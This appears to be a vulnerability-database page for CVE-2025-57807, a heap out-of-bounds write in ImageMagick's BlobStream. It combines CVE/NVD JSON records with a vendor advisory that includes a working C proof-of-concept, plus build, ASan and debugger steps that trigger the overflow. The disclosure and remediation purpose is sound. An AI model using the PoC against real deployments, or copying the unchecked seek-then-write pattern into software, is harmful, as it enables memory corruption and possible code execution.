CVE-2025-57807 (GCVE-0-2025-57807)

Vulnerability from cvelistv5

Published

2025-09-05 21:16

Modified

2025-09-08 14:06

Severity ?

3.8 (Low) - CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L

CWE

CWE-787 - Out-of-bounds Write
CWE-122 - Heap-based Buffer Overflow
CWE-131 - Incorrect Calculation of Buffer Size

Summary

ImageMagick is free and open-source software used for editing and manipulating digital images. ImageMagick versions lower than 14.8.2 include insecure functions: SeekBlob(), which permits advancing the stream offset beyond the current end without increasing capacity, and WriteBlob(), which then expands by quantum + length (amortized) instead of offset + length, and copies to data + offset. When offset ≫ extent, the copy targets memory beyond the allocation, producing a deterministic heap write on 64-bit builds. No 2⁶⁴ arithmetic wrap, external delegates, or policy settings are required. This is fixed in version 14.8.2.

References

URL	Tags
security-advisories@github.com	https://github.com/ImageMagick/ImageMagick/commit/077a417a19a5ea8c85559b602754a5b928eef23e	Patch
security-advisories@github.com	https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-23hg-53q6-hqfg	Exploit, Mitigation, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-23hg-53q6-hqfg	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	ImageMagick	ImageMagick	Version: < 14.8.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-57807",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-09-08T13:58:41.418003Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-09-08T14:06:13.529Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-23hg-53q6-hqfg"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "ImageMagick",
          "vendor": "ImageMagick",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 14.8.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "ImageMagick is free and open-source software used for editing and manipulating digital images. ImageMagick versions lower than 14.8.2 include  insecure functions: SeekBlob(), which permits advancing the stream offset beyond the current end without increasing capacity, and WriteBlob(), which then expands by quantum + length (amortized) instead of offset + length, and copies to data + offset. When offset \u226b extent, the copy targets memory beyond the allocation, producing a deterministic heap write on 64-bit builds. No 2\u2076\u2074 arithmetic wrap, external delegates, or policy settings are required. This is fixed in version 14.8.2."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "availabilityImpact": "LOW",
            "baseScore": 3.8,
            "baseSeverity": "LOW",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-787",
              "description": "CWE-787: Out-of-bounds Write",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-122",
              "description": "CWE-122: Heap-based Buffer Overflow",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-131",
              "description": "CWE-131: Incorrect Calculation of Buffer Size",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-09-05T21:16:02.742Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-23hg-53q6-hqfg",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-23hg-53q6-hqfg"
        },
        {
          "name": "https://github.com/ImageMagick/ImageMagick/commit/077a417a19a5ea8c85559b602754a5b928eef23e",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/ImageMagick/ImageMagick/commit/077a417a19a5ea8c85559b602754a5b928eef23e"
        }
      ],
      "source": {
        "advisory": "GHSA-23hg-53q6-hqfg",
        "discovery": "UNKNOWN"
      },
      "title": "ImageMagick BlobStream Forward-Seek Under-Allocation"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-57807",
    "datePublished": "2025-09-05T21:16:02.742Z",
    "dateReserved": "2025-08-20T14:30:35.010Z",
    "dateUpdated": "2025-09-08T14:06:13.529Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-57807\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-09-05T22:15:34.340\",\"lastModified\":\"2025-09-10T15:31:10.927\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"ImageMagick is free and open-source software used for editing and manipulating digital images. ImageMagick versions lower than 14.8.2 include  insecure functions: SeekBlob(), which permits advancing the stream offset beyond the current end without increasing capacity, and WriteBlob(), which then expands by quantum + length (amortized) instead of offset + length, and copies to data + offset. When offset \u226b extent, the copy targets memory beyond the allocation, producing a deterministic heap write on 64-bit builds. No 2\u2076\u2074 arithmetic wrap, external delegates, or policy settings are required. This is fixed in version 14.8.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L\",\"baseScore\":3.8,\"baseSeverity\":\"LOW\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":0.3,\"impactScore\":3.4},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-122\"},{\"lang\":\"en\",\"value\":\"CWE-131\"},{\"lang\":\"en\",\"value\":\"CWE-787\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"6.9.13-29\",\"matchCriteriaId\":\"FC732AAB-616A-40C4-8A70-E37496BB80B8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"7.0.0-0\",\"versionEndExcluding\":\"7.1.2-3\",\"matchCriteriaId\":\"2B5E6F5D-FFF2-4BB0-AB68-9A7AB9AE606B\"}]}]}],\"references\":[{\"url\":\"https://github.com/ImageMagick/ImageMagick/commit/077a417a19a5ea8c85559b602754a5b928eef23e\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-23hg-53q6-hqfg\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-23hg-53q6-hqfg\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-57807\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-09-08T13:58:41.418003Z\"}}}], \"references\": [{\"url\": \"https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-23hg-53q6-hqfg\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-09-08T13:58:43.640Z\"}}], \"cna\": {\"title\": \"ImageMagick BlobStream Forward-Seek Under-Allocation\", \"source\": {\"advisory\": \"GHSA-23hg-53q6-hqfg\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 3.8, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"LOW\", \"vectorString\": \"CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"HIGH\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"ImageMagick\", \"product\": \"ImageMagick\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 14.8.2\"}]}], \"references\": [{\"url\": \"https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-23hg-53q6-hqfg\", \"name\": \"https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-23hg-53q6-hqfg\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/ImageMagick/ImageMagick/commit/077a417a19a5ea8c85559b602754a5b928eef23e\", \"name\": \"https://github.com/ImageMagick/ImageMagick/commit/077a417a19a5ea8c85559b602754a5b928eef23e\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"ImageMagick is free and open-source software used for editing and manipulating digital images. ImageMagick versions lower than 14.8.2 include  insecure functions: SeekBlob(), which permits advancing the stream offset beyond the current end without increasing capacity, and WriteBlob(), which then expands by quantum + length (amortized) instead of offset + length, and copies to data + offset. When offset \\u226b extent, the copy targets memory beyond the allocation, producing a deterministic heap write on 64-bit builds. No 2\\u2076\\u2074 arithmetic wrap, external delegates, or policy settings are required. This is fixed in version 14.8.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-787\", \"description\": \"CWE-787: Out-of-bounds Write\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-122\", \"description\": \"CWE-122: Heap-based Buffer Overflow\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-131\", \"description\": \"CWE-131: Incorrect Calculation of Buffer Size\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-09-05T21:16:02.742Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-57807\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-09-08T14:06:13.529Z\", \"dateReserved\": \"2025-08-20T14:30:35.010Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-09-05T21:16:02.742Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

fkie_cve-2025-57807

Vulnerability from fkie_nvd

Published

2025-09-05 22:15

Modified

2025-09-10 15:31

Severity ?

3.8 (Low) - CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/ImageMagick/ImageMagick/commit/077a417a19a5ea8c85559b602754a5b928eef23e	Patch
security-advisories@github.com	https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-23hg-53q6-hqfg	Exploit, Mitigation, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-23hg-53q6-hqfg	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	imagemagick	imagemagick	*
	imagemagick	imagemagick	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "FC732AAB-616A-40C4-8A70-E37496BB80B8",
              "versionEndExcluding": "6.9.13-29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "2B5E6F5D-FFF2-4BB0-AB68-9A7AB9AE606B",
              "versionEndExcluding": "7.1.2-3",
              "versionStartIncluding": "7.0.0-0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "ImageMagick is free and open-source software used for editing and manipulating digital images. ImageMagick versions lower than 14.8.2 include  insecure functions: SeekBlob(), which permits advancing the stream offset beyond the current end without increasing capacity, and WriteBlob(), which then expands by quantum + length (amortized) instead of offset + length, and copies to data + offset. When offset \u226b extent, the copy targets memory beyond the allocation, producing a deterministic heap write on 64-bit builds. No 2\u2076\u2074 arithmetic wrap, external delegates, or policy settings are required. This is fixed in version 14.8.2."
    }
  ],
  "id": "CVE-2025-57807",
  "lastModified": "2025-09-10T15:31:10.927",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "LOCAL",
          "availabilityImpact": "LOW",
          "baseScore": 3.8,
          "baseSeverity": "LOW",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 0.3,
        "impactScore": 3.4,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2025-09-05T22:15:34.340",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/ImageMagick/ImageMagick/commit/077a417a19a5ea8c85559b602754a5b928eef23e"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-23hg-53q6-hqfg"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-23hg-53q6-hqfg"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-122"
        },
        {
          "lang": "en",
          "value": "CWE-131"
        },
        {
          "lang": "en",
          "value": "CWE-787"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

ghsa-23hg-53q6-hqfg

Vulnerability from github

Published

2025-09-05 20:09

Modified

2025-09-10 20:49

Severity ?

3.8 (Low) - CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L

Summary

ImageMagick BlobStream Forward-Seek Under-Allocation

Details

Reporter: Lumina Mescuwa
Product: ImageMagick 7 (MagickCore)
Component: MagickCore/blob.c (Blob I/O - BlobStream)
Tested: 7.1.2-0 (source tag) and 7.1.2-1 (Homebrew), macOS arm64, clang-17, Q16-HDRI
Impact: Heap out-of-bounds WRITE (attacker-controlled bytes at attacker-chosen offset) → memory corruption; potential code execution

Executive Summary

For memory-backed blobs (BlobStream), SeekBlob() permits advancing the stream offset beyond the current end without increasing capacity. The subsequent WriteBlob() then expands by quantum + length (amortized) instead of offset + length, and copies to data + offset. When offset ≫ extent, the copy targets memory beyond the allocation, producing a deterministic heap write on 64-bit builds. No 2⁶⁴ arithmetic wrap, external delegates, or policy settings are required.

Affected Scope

Versions confirmed: 7.1.2-0, 7.1.2-1
Architectures: Observed on macOS arm64; architecture-agnostic on LP64
Paths: MagickCore blob subsystem — BlobStream (SeekBlob() and WriteBlob()).
Not required: External delegates; special policies; integer wraparound

Technical Root Cause

Types (LP64):
offset: MagickOffsetType (signed 64-bit)
extent/length/quantum: size_t (unsigned 64-bit)
data: unsigned char*

Contract mismatch:

SeekBlob() (BlobStream) updates offset to arbitrary positions, including past end, without capacity adjustment.
WriteBlob() tests offset + length >= extent and grows by length + quantum, doubles quantum, reallocates to extent + 1, then:

q = data + (size_t)offset; memmove(q, src, length);

There is no guarantee that extent ≥ offset + length post-growth. With offset ≫ extent, q is beyond the allocation.

Wrap-free demonstration:
Initialize extent=1, write one byte (offset=1), seek to 0x10000000 (256 MiB), then write 3–4 bytes. Growth remains << offset + length; the copy overruns the heap buffer.

Exploitability & Reachability

Primitive: Controlled bytes written at a controlled displacement from the buffer base.
Reachability: Any encode-to-memory flow that forward-seeks prior to writing (e.g., header back-patching, reserved-space strategies). Even if current encoders/writers avoid this, the API contract permits it, thus creating a latent sink for first- or third-party encoders/writers.
Determinism: Once a forward seek past end occurs, the first subsequent write reliably corrupts memory.

Impact Assessment

Integrity: High - adjacent object/metadata overwrite plausible.
Availability: High - reliably crashable (ASan and non-ASan).
Confidentiality: High - Successful exploitation to RCE allows the attacker to read all data accessible by the compromised process.
RCE plausibility: Typical of heap OOB writes in long-lived image services; allocator/layout dependent.

CVSS v3.1 Rationale (9.8)

AV:N / PR:N / UI:N - server-side image processing is commonly network-reachable without auth or user action.
AC:L - a single forward seek + write suffices; no races or specialized state.
S:U - corruption localized to the ImageMagick process.
C:H / I:H / A:H - A successful exploit leads to RCE, granting full control over the process. This results in a total loss of Confidentiality (reading sensitive data), Integrity (modifying files/data), and Availability (terminating the service).

Base scoring assumes successful exploitation; environmental mitigations are out of scope of Base metrics.

Violated Invariant

Before copying length bytes at offset, enforce extent ≥ offset + length with overflow-checked arithmetic.

The BlobStream growth policy preserves amortized efficiency but fails to enforce this per-write safety invariant.

Remediation (Principle)

In WriteBlob() (BlobStream case):

Checked requirement:
need = (size_t)offset + length; → if need < (size_t)offset, overflow → fail.
Ensure capacity ≥ need:
target = MagickMax(extent + quantum + length, need);
(Optionally loop, doubling quantum, until extent ≥ need to preserve amortization.)
Reallocate to target + 1 before copying; then perform the move.

Companion hardening (recommended):

Document or restrict SeekBlob() on BlobStream so forward seeks either trigger explicit growth/zero-fill or require the subsequent write to meet the invariant.
Centralize blob arithmetic in checked helpers.
Unit tests: forward-seek-then-write (success and overflow-reject).

Regression & Compatibility

Behavior change: Forward-seeked writes will either allocate to required size or fail cleanly (overflow/alloc-fail).
Memory profile: Single writes after very large seeks may allocate large buffers; callers requiring sparse behavior should use file-backed streams.

Vendor Verification Checklist

Reproduce with a minimal in-memory BlobStream harness under ASan.
Apply fix; verify extent ≥ offset + length at all write sites.
Add forward-seek test cases (positive/negative).
Audit other growth sites (SetBlobExtent, stream helpers).
Clarify BlobStream seek semantics in documentation.
Unit test: forward seek to large offset on BlobStream followed by 1–8 byte writes; assert either growth to need or clean failure.

PoC / Reproduction / Notes

Environment

OS/Arch: macOS 14 (arm64)
Compiler: clang-17 with AddressSanitizer
ImageMagick: Q16-HDRI
Prefix: ~/opt/im-7.1.2-0
pkg-config: from PATH (no hard-coded /usr/local/...)

Build ImageMagick 7.1.2-0 (static, minimal)

```bash ./configure --prefix="$HOME/opt/im-7.1.2-0" --enable-hdri --with-quantum-depth=16 \ --disable-shared --enable-static --without-modules \ --without-magick-plus-plus --disable-openmp --without-perl \ --without-x --without-lqr --without-gslib

make -j"$(sysctl -n hw.ncpu)" make install

"$HOME/opt/im-7.1.2-0/bin/magick" -version > magick_version.txt ```

Build & Run the PoC (memory-backed BlobStream)

poc.c:
Uses private headers (blob-private.h) to exercise blob internals; a public-API variant (custom streams) is feasible but unnecessary for triage.

```c // poc.c

include

include "MagickCore/blob-private.h"

int main(int argc, char **argv) {

MagickCoreGenesis(argv[0], MagickTrue);

ExceptionInfo *e = AcquireExceptionInfo();

ImageInfo *ii = AcquireImageInfo();

Image *im = AcquireImage(ii, e);

if (!im) return 1;

// 1-byte memory blob → BlobStream

unsigned char buf = (unsigned char) malloc(1);

buf[0] = 0x41;

AttachBlob(im->blob, buf, 1); // type=BlobStream, extent=1, offset=0

SetBlobExempt(im, MagickTrue); // don't free our malloc'd buf

// Step 1: write 1 byte (creates BlobInfo + sets offset=1)

unsigned char A = 0x42;

(void) WriteBlob(im, 1, &A);

fprintf(stderr, "[+] after 1 byte: off=%lld len=%zu\n",

(long long) TellBlob(im), (size_t) GetBlobSize(im));

// Step 2: seek way past end without growing capacity

const MagickOffsetType big = (MagickOffsetType) 0x10000000; // 256 MiB

(void) SeekBlob(im, big, SEEK_SET);

fprintf(stderr, "[+] after seek: off=%lld len=%zu\n",

(long long) TellBlob(im), (size_t) GetBlobSize(im));

// Step 3: small write → reallocation grows by quantum+length, not to offset+length

// memcpy then writes to data + offset (OOB)

const unsigned char payload[] = "PWN";

(void) WriteBlob(im, sizeof(payload), payload);

// If we get here, it didn't crash

fprintf(stderr, "[-] no crash; check ASan flags.\n");

(void) CloseBlob(im);

DestroyImage(im); DestroyImageInfo(ii); DestroyExceptionInfo(e);

MagickCoreTerminus();

return 0;

} ```

run:

```bash

Use the private prefix for pkg-config

export PKG_CONFIG_PATH="$HOME/opt/im-7.1.2-0/lib/pkgconfig:$PKG_CONFIG_PATH"

Strict ASan for crisp failure

export ASAN_OPTIONS='halt_on_error=1:abort_on_error=1:detect_leaks=0:fast_unwind_on_malloc=0'

Compile (static link pulls transitive deps via --static)

clang -std=c11 -g -O1 -fno-omit-frame-pointer -fsanitize=address -o poc poc.c \ $(pkg-config --cflags MagickCore-7.Q16HDRI) \ $(pkg-config --static --libs MagickCore-7.Q16HDRI)

Execute and capture

./poc 2>&1 | tee asan.log ```

Expected markers prior to the fault:

[+] after 1 byte: off=1 len=1 [+] after seek: off=268435456 len=1

An ASan WRITE crash in WriteBlob follows (top frames: WriteBlob blob.c:<line>, then _platform_memmove / __sanitizer_internal_memmove).

Debugger Verification (manual)

LLDB can be used to snapshot the invariants; ASan alone is sufficient.

``` lldb ./poc (lldb) settings set use-color false (lldb) break set -n WriteBlob (lldb) run

First stop (prime write)

(lldb) frame var length (lldb) frame var image->blob->type image->blob->offset image->blob->length image->blob->extent image->blob->quantum image->blob->mapped (lldb) continue

Second stop (post-seek write)

(lldb) frame var length (lldb) frame var image->blob->type image->blob->offset image->blob->length image->blob->extent image->blob->quantum image->blob->mapped (lldb) expr -- (unsigned long long)image->blob->offset + (unsigned long long)length (lldb) expr -- (void)((unsigned char)image->blob->data + (size_t)image->blob->offset)

Into the fault; if inside memmove (no locals):

(lldb) bt (lldb) frame select 1 (lldb) frame var image->blob->offset image->blob->length image->blob->extent image->blob->quantum ```

Expected at second stop:
type = BlobStream · offset ≈ 0x10000000 (256 MiB) · length ≈ 3–4 · extent ≈ 64 KiB (≪ offset + length) · quantum ≈ 128 KiB · mapped = MagickFalse · data + offset far beyond base; next continue crashes in _platform_memmove.

Credits

Reported by: Lumina Mescuwa

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-OpenMP-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-OpenMP-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-OpenMP-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-OpenMP-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-OpenMP-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-OpenMP-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-57807"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-122",
      "CWE-131",
      "CWE-787"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-05T20:09:19Z",
    "nvd_published_at": "2025-09-05T22:15:34Z",
    "severity": "LOW"
  },
